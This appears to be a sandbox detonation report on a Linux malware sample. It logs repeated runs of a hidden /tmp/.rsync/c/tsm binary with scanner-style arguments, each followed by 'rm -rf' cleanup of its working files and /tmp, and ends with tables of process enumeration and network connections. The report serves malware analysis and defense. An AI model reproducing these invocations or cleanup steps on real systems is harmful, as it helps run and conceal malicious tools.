[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.5:443 | tcp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240418-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/18/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/695/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/37/status | /bin/ps | N/A |
| File opened for reading | /proc/69/stat | /bin/ps | N/A |
| File opened for reading | /proc/240/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/362/stat | /bin/ps | N/A |
